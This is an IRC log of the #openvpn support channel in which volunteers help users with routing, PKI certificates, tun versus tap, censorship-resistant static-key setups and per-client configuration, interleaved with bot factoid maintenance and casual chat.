02:43 < pekster> That said, tun is a point-to-point interface; it's probably not going to do what you expect to drop a 2nd IP there.
You should fix your jail to do what you want instead 02:51 < matsh> I have no idea either. 02:51 < matsh> But thanks 03:07 -!- dazo_afk is now known as dazo 03:16 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 248 seconds] 03:17 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 03:22 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:30 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:30 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 03:31 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 245 seconds] 03:32 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has joined #openvpn 03:32 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has quit [Changing host] 03:32 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 03:33 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 03:35 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Client Quit] 03:43 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:44 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Client Quit] 03:47 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has joined #openvpn 03:56 -!- dballester [~dballeste@139.49.17.109.rev.sfr.net] has joined #openvpn 03:56 < dballester> hi to all 04:00 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has quit [Quit: mirco] 04:04 < dballester> if in a client config I type push "route 10.0.0.0 255.255.0.0" i should see a new route entry in the client routing table, isn't it? 
04:07 < pekster> Possibly, if the client initiates a pull request (via --client or --pull features) and is not omitting adding routes and does not have an error when adding them 04:12 < dballester> i don't see any error in client syslog but i don't see the route in client's routing table :/ 04:13 < pekster> pastebin logs with the client at 'verb 4' 04:15 < dballester> may be i must activate the verb 4 to see 04:16 < dballester> :) 04:18 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 04:19 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 04:23 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 272 seconds] 04:23 -!- mirco_ is now known as mirco 04:25 < dballester> pekster, by now I'm reading "Including multiple machines on the client side when using a routed VPN (dev tun)" from http://openvpn.net/index.php/open-source/documentation/howto.html 04:25 <@vpnHelper> Title: HOWTO (at openvpn.net) 04:27 < pekster> dballester: And 10.0/16 is the client-side network? 
04:27 < dballester> i will try to paste an image 04:28 < pekster> !clientlan 04:28 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 04:28 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 04:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 04:33 < dballester> some devices are mikrotik ( no full openvpn client implementation ) I will tst, thanks for the info pekster 04:33 < dballester> tst/test 04:35 -!- odoacre [~antonio@222.126.240.10] has joined #openvpn 04:37 < odoacre> hey, i'm wondering if anyone has some tips to stop the chinese firewall to keep killing my openvpn connection 04:39 < pekster> That depends on how they're detecting the connection. You could try changing the listening port, but openvpn has a detectable protocol handshake when used with certificates 04:39 < odoacre> oh 04:39 < odoacre> soi should try with no certificates ? 04:39 < pekster> You could use it in p2p mode with static keys (ie: use of --secret instead of --cert and --key) which has no handshake fingerprint 04:40 < odoacre> i think they don't especially care much that it's openvpn, they care about the fact that it's encrypted 04:40 < odoacre> but thanks for the tip i'll try that out 04:40 < pekster> Right. 
The downside security-wise is that the keys need to be transferred over an already-secure channel (like ssh) and you don't have perfect forward secrecy (so if your key gets stolen later, an attacker could decrypt any past sessions secured with that key if they have the traffic stored) 04:41 < odoacre> yeah, that's not a huge issue for me 04:41 < pekster> There's also an obfsproxy project that's designed to obfuscate network-level connections. I don't know much about it, but I think we have a link to the project: 04:41 < pekster> !obfsproxy 04:41 < odoacre> i mainly encrypt it only to bypass the censorship filter 04:41 <@vpnHelper> "obfsproxy" is For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 04:41 < odoacre> nice! 04:42 < pekster> If that's your use-case, you might have luck with the static keyed setup in p2p mode then 04:42 < odoacre> that's awesome 04:42 < pekster> It's still encrypted, but there is no handshake, so it just looks like raw data going down the wire 04:42 < odoacre> that was very helpful pekster, thanks a lot 04:42 < odoacre> i'll let you know if it works better 04:42 < pekster> yup. Best of luck; censorship sucks 04:43 < odoacre> word 04:44 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 04:48 <@dazo> !obfs 04:48 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en to encapsulate your packets in other protocols or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation or (#3) in client/server mode an admin can know that openvpn is being used. in 04:48 <@vpnHelper> static-key mode they only know that it is some encrypted data, but not specifically openvpn; however with static-key you lose forward security (!forwardsecurity) 04:49 <@dazo> !learn obfsproxy as See also !obfs. 
The link to TrafficObfuscation also contains a setup example 04:49 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 04:49 <@dazo> !whoami 04:49 <@vpnHelper> I don't recognize you. 04:49 <@dazo> ecrist: ^^ w00t!? 04:50 < pekster> krzee had some issue updating the bot access list and needs to reset access for some folks. "half" of the access list was lost, or something 04:50 < pekster> !learn obfsproxy as See also !obfs. The link to TrafficObfuscation also contains a setup example 04:50 <@vpnHelper> Joo got it. 04:50 * pekster just happens to be in the other half atm 04:51 <@dazo> ahh! thx pekster! 04:51 * pekster digs back into code to see why builds keep exploding on his patch 05:15 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 05:15 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds] 05:16 -!- APTX [APTX@unaffiliated/aptx] has quit [Quit: No Ping reply in 180 seconds.] 
05:17 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 05:51 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds] 05:53 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 05:53 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 05:53 -!- BtbN [~btbn@btbn.de] has joined #openvpn 05:57 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 05:57 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 05:57 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 05:57 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 05:58 -!- dpecka [~dpecka@193.165.171.107] has joined #openvpn 05:58 < dpecka> hello 05:58 < dpecka> i have stupid Q: 05:58 < dpecka> where is specified and how openvpn server knows, that he should look for the client keys in etc/openvpn/easy-rsa/2.0/keys/ ? 06:00 <@dazo> dpecka: the OpenVPN server doesn't care about etc/openvpn/easy-rsa/2.0/keys/ at all 06:00 <@dazo> dpecka: in fact easy-rsa certificate and key files shouldn't be on the server at all 06:01 <@dazo> dpecka: OpenVPN server and client verifies the certificate signatures ... if that matches what it would expect from the ca.crt (--ca on the configs), then it is considered to be a trusted server or client certificate 06:01 < dpecka> dazo: o.O but, but .. 06:02 <@dazo> that's how PKI works ... the CA is a trusted third party which clients and servers both know and trust .... and the CA signs certificates to servers and clients 06:02 < dpecka> dazo: then i don't understand how it works 06:02 < dpecka> ca /etc/openvpn/easy-rsa/2.0/keys/ca.crt 06:02 < dpecka> cert /etc/openvpn/easy-rsa/2.0/keys/server.crt 06:02 < dpecka> key /etc/openvpn/easy-rsa/2.0/keys/server.key 06:02 < dpecka> ^^ this is needed 06:02 < dpecka> and clients have set similar in their client.cfg 06:02 <@dazo> yeah ... 
just move those three files to /etc/openvpn instead . 06:03 < dpecka> they use ca.crt and klient.crt and client.key 06:03 <@dazo> the CA key is the most sacred file you'll ever have ... if that one gets "lost" (read: stolen) ... then you can't trust any clients or server any more 06:03 <@dazo> I did a write-up a long time ago, which is still a draft .... but this might help you understand a bit more: https://community.openvpn.net/openvpn/wiki/How_does_PKI_work 06:03 <@vpnHelper> Title: How_does_PKI_work – OpenVPN Community (at community.openvpn.net) 06:04 < dpecka> thanks 06:07 -!- dmonjo [~dmonjo@178.135.18.38] has joined #openvpn 06:07 < dmonjo> hello 06:08 < dmonjo> what are the beneifts of doing bridging vpn vs the ip ? 06:08 < dmonjo> layer2 vs layer3 06:08 < dpecka> dazo: i don't understand than why how generated client key relates to ca.crt 06:08 < dpecka> **then 06:09 < pekster> dmonjo: 06:09 < pekster> !tunortap 06:09 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 06:09 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 06:09 < dpecka> dazo: what it is good for .. if you have ca.crt you can use it for generating unlimited amount of client certs, right ? 06:10 < pekster> dmonjo: Generally speaking, you don't want to bridge unless you have an actual need to exchange Ethernet or multicast traffic. 
tun has less overhead, doesn't waste bandwidth with subnet broadcast traffic, and is slightly more secure against Layer 2 attacks performed by compromised VPN clients 06:10 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 06:11 < pekster> dpecka: ca.key does the signing; the .crt files are the public keys (the "public" in "Public Key Infrastructure") 06:12 < dmonjo> pekster: what i want to do is connect 2 connections from source to an openvpn server i want to take advantages of combining the throughput of both connections (1mb conn1 + 2mb conn2) = 3mb uplink to outside server 06:12 < dmonjo> for that i think only tap works right 06:13 < pekster> That won't work the way you expect without cooperation from the other endpoint, and if you have that you might as well trunk over the native links and run openvpn on top of that if you need a security layer 06:15 < dmonjo> pekster: both endpoints are under my control 06:15 < dmonjo> what do you mean by cooperation 06:16 < pekster> If you're not familiar with trunking, it's not like normal routing since the peer needs to accept traffic from an address that's bound to the other line in a trunked configuration 06:16 < pekster> You can't just connect 2 uplinks and expect to add your throughput together like magic; that's not how it works 06:19 < pekster> This is a Linux-centric example, but here's a brief demonstration of what you'd need for that kind of a trunk over whatever random provider you have: http://lartc.org/howto/lartc.loadshare.html 06:19 <@vpnHelper> Title: Load sharing over multiple interfaces (at lartc.org) 06:19 < pekster> Specifically, note the caveats section where they explain that you won't actually get any practical performance benefit from this 06:20 < pekster> But it might depend on your traffic and usecase I guess 06:32 < havoc> interesting/relevant: http://therosiek.com/2011/03/nic-teaming-on-debian-squeeze/ 06:32 <@vpnHelper> Title: NIC Teaming on Debian Squeeze « 
TheRosiek.com (at therosiek.com) 06:36 < pekster> teaming works well where you have 2 identical pieces of hardware connected to a physical switch, but not so well when you have things like unmatched WAN links to 2 providers. I guess technically, yes, you can use tap and team across them with support of the remote endpoint you're connected to if it bridges them back. I'd wager that performance will be worse than if you used 1 ISP alone 06:36 <@plaisthos> should be okay if you use standard teaming 06:36 <@plaisthos> which will use only one of the links per connection 06:38 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 244 seconds] 06:39 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 06:45 < havoc> pekster: yeah 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:48 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 06:52 < havoc> pekster: I was looking at it for my SuperMicro servers, dual NICs 06:53 < havoc> pekster: particularly for a debian VM host 06:56 < dmonjo> pekster: i think if the 2 source links are going from the same ISP it would work just fine since the 2 links would be running with same latency more or less 06:57 < dmonjo> if we using different isps then latency would make the 2 links slower yes 07:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:02 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 07:04 <@ecrist> !learn obfsproxy as See also !obfs. The link to TrafficObfuscation also contains a setup example 07:04 <@vpnHelper> Joo got it. 
07:04 -!- master_of_master [~master_of@p57B54352.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 07:04 < pekster> I think I already added that 07:04 < pekster> !obfsproxy 07:04 <@vpnHelper> "obfsproxy" is (#1) For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 or (#2) See also !obfs. The link to TrafficObfuscation also contains a setup example or (#3) See also !obfs. The link to TrafficObfuscation also contains a setup example 07:05 <@ecrist> yeah, you did 07:05 <@ecrist> sorry, was reading scroll-back 07:05 < pekster> np 07:05 < pekster> Better have the info twice than not at all :) 07:05 < pekster> !forget obfsproxy 3 07:05 <@vpnHelper> Joo got it. 07:05 < pekster> But once is better 07:06 -!- master_of_master [~master_of@87.181.77.103] has joined #openvpn 07:06 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 07:07 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 07:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 07:09 <@ecrist> I should update the factiods page 07:10 <@ecrist> !factoids 07:10 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 07:12 -!- JSharpe [~JSharpe@188.227.181.234] has joined #openvpn 07:21 <@ecrist> there, now it'll update every 5 minutes automagically 07:21 < pekster> cron is a magical thing 07:22 <@plaisthos> invented by the ancient greeks! 07:22 <@plaisthos> (or so I heard) 07:22 <@ecrist> wowsers, we have a lot of factoids now 07:23 < pekster> One of my current */15 crons is waiting for the next rtorrent segfault so I can get a useful backtrace :) 07:23 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 07:26 <@plaisthos> !-- is wrong btw. 
07:26 <@plaisthos> !-- 07:26 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix must be removed when an option is placed in a configuration file. 07:27 <@plaisthos> !forget -- 07:27 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 07:27 < pekster> Right, config file will eat leading dashes IIRC 07:27 < pekster> The bot had some memory loss on access lists last night 07:27 <@plaisthos> :) 07:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 07:28 <@plaisthos> this prefix is usually omitted in a configuration file 07:28 <@plaisthos> -- works too btw :) 07:28 <@ecrist> !forget -- 07:28 <@vpnHelper> Joo got it. 07:30 <@plaisthos> !forget android-ipv6 07:30 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 07:30 <@plaisthos> that is outdated 07:30 <@plaisthos> and forget !kindle 07:32 <@plaisthos> and !learn !kindle as OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 07:32 <@vpnHelper> Title: Index of /android (at plai.de) 07:35 < dmonjo> what are the advantages of openvpn over other vpn solutions 07:35 < dmonjo> other than being opensource 07:35 < dmonjo> feature wise 07:38 < pekster> Off the top of my head: ease of config, operates completely over a single UDP (or TCP) port making it NAT/firewall friendly are the big ones. 
It's also secure, unlike f.ex: pptp 07:38 < pekster> Well, "secure when used properly" like any proper security solution 07:39 < pekster> Very platform agnostic too, despite not being included "out of the box" 07:43 <@ecrist> let me fix your bot access, plaisthos, then you can do it 07:44 -!- pnielsen_ [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 07:44 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 07:45 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Ping timeout: 264 seconds] 07:45 -!- pnielsen_ is now known as pnielsen 07:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:51 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 07:52 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:52 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:52 <@ecrist> plaisthos: try now 07:52 <@ecrist> !whoami 07:52 <@vpnHelper> I don't recognize you. 07:53 <@ecrist> raar 07:53 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 07:54 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 07:54 < dpecka> sorry boys but i don't understand clearly how it works 07:55 < dpecka> is easy-rsa/2.0/build-key chained somehow to existing ca.crt ? so when i build new client key with included . vars, is ca.crt used to create client key ? 07:55 < dpecka> can attacker get access to my vpn server if he gets ca.crt ? 
07:55 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 260 seconds] 07:56 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:56 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:56 <@ecrist> dpecka: once your CA is built with easy-rsa, it uses that structure to build client certs 07:56 <@ecrist> ca.crt is safe to give out to anyone 07:56 <@ecrist> it's the ca.key you need to keep safe 07:56 <@ecrist> !whoami 07:56 <@vpnHelper> ecrist 07:57 <@ecrist> pekster: do you still have bot access? (just do !whoami) 07:58 -!- nickanderson_afk is now known as nickanderson 07:58 < dpecka> ecrist: ah, so nobody can generate key usable to establish connection without ca.key ? 07:59 < dpecka> ecrist: also i'd like to ask, if default setup as it is described in howto (with 1024b keys length) is strong enough 08:00 < pekster> !whoami 08:00 <@vpnHelper> support 08:00 < pekster> Based on the cloak now it appears 08:00 <@ecrist> dpecka: correct, you need both ca.crt and ca.key to generate new certificates, and you need the password for ca.key, as well 08:00 < dpecka> i mean: . vars; ./build-ca; build-key-server server; ./build-key client0 08:00 <@ecrist> pekster: perfect 08:00 <@ecrist> I *think* i have the bot access list resolved 08:00 < dpecka> ecrist: thanks much 08:01 <@ecrist> dpecka: 1024 is strong enough, but we recently changed the default to 2048 08:01 < dpecka> okay 08:01 <@ecrist> it's available in git, but we haven't released that yet 08:01 <@ecrist> (you can just change the openssl conf) 08:02 < dpecka> thanks guys .. everything works fine for me .. 
i just followed howto and made few more changes in regard to documentation 08:02 * pekster is buried in manpages now, forcing himself to learn how to prepare this patch the "right" way in git :) 08:02 -!- nickanderson [~cmdln@ginger.pilgrimpage.com] has left #openvpn [] 08:02 <@ecrist> pekster: git clone, make your changes, git commit, git diff 08:03 <@ecrist> you can do the pull request thing, too, but I don't know how to do that 08:03 <@plaisthos> !whoami 08:03 <@vpnHelper> developers 08:03 < pekster> Yea, I first was trying to see how to root to the 2.3.0 tag (or w/e the git version of a tag is) 08:03 <@plaisthos> !forget android-ipv6 08:03 <@vpnHelper> Joo got it. 08:03 <@plaisthos> !learn kindle as OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 08:03 <@vpnHelper> Joo got it. 08:03 < dpecka> ecrist: last Q:, can i somehow granularly set up different settings per-client (like different routes, etc) or do I have to run another instance of openvpn ? 08:03 <@plaisthos> !-- 08:03 <@plaisthos> !kindle 08:03 <@vpnHelper> "kindle" is (#1) http://plai.de/android/ - Please report back if you have issues, or if it worked well. (blame plaisthos either way) or (#2) OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 08:04 <@plaisthos> !forget kindle 1 08:04 <@vpnHelper> Joo got it. 08:04 <@plaisthos> !kindle 08:04 <@vpnHelper> "kindle" is OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 08:04 <@ecrist> dpecka: yes, using CCD 08:04 <@ecrist> !ccd 08:04 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 
08:04 <@plaisthos> !-- does not seem to work at all :) 08:04 < dpecka> great 08:04 < dpecka> fantastic 08:05 <@ecrist> plaisthos: I removed it above, for you 08:08 <@plaisthos> ah okay 08:08 -!- dmonjo_ [~dmonjo@178.135.250.76] has joined #openvpn 08:09 <@plaisthos> !learn -- as OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 08:09 <@vpnHelper> Joo got it. 08:10 -!- defswork [~andy@141.0.50.105] has joined #openvpn 08:10 -!- dmonjo [~dmonjo@178.135.18.38] has quit [Ping timeout: 276 seconds] 08:16 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 256 seconds] 08:28 -!- defswork [~andy@141.0.50.105] has joined #openvpn 08:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 276 seconds] 08:58 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 09:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:07 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:26 < dbhaber_> http://www.cnn.com/2013/02/20/us/california-hotel-water-corpse/index.html?hpt=hp_c1 09:26 <@vpnHelper> Title: Corpse found in L.A. 
hotel's water tank - CNN.com (at www.cnn.com) 09:26 < dbhaber_> win 09:29 -!- dmonjo__ [~dmonjo@178.135.211.106] has joined #openvpn 09:31 -!- dmonjo_ [~dmonjo@178.135.250.76] has quit [Ping timeout: 244 seconds] 09:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:48 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 09:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 09:54 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 10:00 -!- zhvtar is now known as Zhvtar 10:02 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:03 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:05 -!- Zhvtar [~zhvtar@unaffiliated/zhvtar] has left #openvpn [] 10:10 -!- echinos_ is now known as echinos 10:12 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 10:16 -!- raidz_away is now known as raidz 10:17 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 10:20 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 10:25 -!- jthunder [~jthunder@70.28.245.58] has joined #openvpn 10:38 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 11:14 -!- dballester [~dballeste@139.49.17.109.rev.sfr.net] has quit [Quit: Saliendo] 11:21 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- It'll be on slashdot one day...] 
11:22 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 11:24 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 11:24 -!- mode/#openvpn [+o mattock_afk] by ChanServ 11:24 -!- mattock_afk is now known as mattock 11:24 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds] 11:25 -!- echinos [~echinos@67.196.136.211] has left #openvpn [] 11:30 -!- jthunder [~jthunder@70.28.245.58] has quit [Quit: jthunder] 11:41 -!- dmonjo__ [~dmonjo@178.135.211.106] has quit [Ping timeout: 255 seconds] 11:50 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 255 seconds] 11:59 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has joined #openvpn 12:08 -!- dazo is now known as dazo_afk 12:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:09 -!- mode/#openvpn [+o krzee] by ChanServ 12:11 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 255 seconds] 12:12 <@krzee> pekster, i saw some scroll about ethernet bonding over 2 links 12:12 <@krzee> i have seen someone do it, and actually increase their single-connection download speed 12:12 -!- folivora_ is now known as folivora 12:12 <@krzee> 2 tap links to the same server over different ISPs, then ethernet bonding them 12:13 <@krzee> however, he ended up getting buffer issues 12:13 < pekster> Right, but the link will be hyper-sensitive to re-ordering or delivery issues 12:13 < pekster> Yea 12:13 <@krzee> exactly 12:13 <@krzee> i was thinking qos could maybe help that 12:13 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 12:13 <@krzee> but never saw him again to suggest it 12:13 < pekster> That wreaks havoc with things like the tcp sliding window, and non-*nix doesn't deal well with the overall re-ordering 12:13 < dioz> pekster: about a week ago you were talking to me in #cisco about some stuff 12:14 < dioz> and i had mentioned 
that my residential gateway doesn't traverse protocol 41 12:14 < pekster> I've never been in #cisco 12:14 < pekster> I hang out in #ipv6 though 12:14 < dioz> maybe #ipv6 then 12:14 < dioz> yah 12:14 < pekster> sixxs.net has AICCU, a client that can speak AYIYA which has an IETF RFC to tunnel 6in4 traffic over UDP 12:15 < dioz> i wonder if sixxs.net has my isp e-mail blocked 12:15 < dioz> cause they won't respond to me 12:15 < pekster> Yea, lots of horror stories about sixx.net and email; you really ought to use an "established" email account; just forward a gmail or something to your personal mail 12:15 < dioz> like gmail 12:15 < dioz> okay thanks 12:16 < pekster> Although if it's with a major ISP that "should" please them. Then again, the guy who runs it is a jerk and uptight about some things, email in particular 12:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:16 < pekster> Just be sure you list everything they want on the contact page, and try and be polite since he gets into a pissing match easy it seems 12:20 < dioz> pekster: 12:20 < dioz> hping3 -0 -t 1 -H 41 -T 12:20 < dioz> doing that to a host in a different AS 12:20 < dioz> it stops at my residential gateway 12:20 < dioz> that would imply to me that it is the gateway blocking the prot41 packets 12:20 < dioz> is that a safe assumption? 12:23 -!- odoacre_ [~antonio@us.happylatte.com] has joined #openvpn 12:24 < dbhaber_> wat 12:24 < dbhaber_> dazo_afk: hello over there 12:24 < dbhaber_> hi krzee 12:24 <@krzee> dougy? 12:25 < dbhaber_> hihi 12:26 -!- dbhaber_ is now known as DougEFresh 12:26 -!- AndrewX192 [~andrew@unaffiliated/andrewx192] has quit [Ping timeout: 246 seconds] 12:26 < DougEFresh> lolol 12:26 <@krzee> wassup man 12:26 < DougEFresh> same ol 12:26 < DougEFresh> how you doin player 12:26 <@krzee> very well 12:26 <@krzee> just released my first mobile unit, did my first interview 12:26 <@krzee> want the link to it? 12:27 < DougEFresh> first what? 
12:27 -!- odoacre [~antonio@222.126.240.10] has quit [Ping timeout: 255 seconds] 12:27 <@krzee> http://www.kittyfeet.com/2013/02/14/jeff-from-liberty-private-network-talks-about-his-secure-bat-phones/ 12:27 <@vpnHelper> Title: » Jeff from Liberty Private Network Talks About His Secure Bat Phones. Anarchy Gumbo Podcast (at www.kittyfeet.com) 12:27 <@krzee> that ^ 12:27 < DougEFresh> interesting 12:29 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 12:32 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 12:34 < DougEFresh> krzee: what else is new 12:34 < DougEFresh> are you still sitting around a bunch of carribean hoez 12:34 <@krzee> just got back from usa 12:34 < DougEFresh> where ya go 12:34 <@krzee> not right now, but yes 12:34 <@krzee> vegas and cali 12:34 < DougEFresh> nice 12:37 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 12:51 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 12:54 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 244 seconds] 13:01 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 13:08 -!- mattock is now known as mattock_afk 13:15 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has quit [] 13:17 -!- takamich_ [~private@c101-159.i07-26.onvol.net] has joined 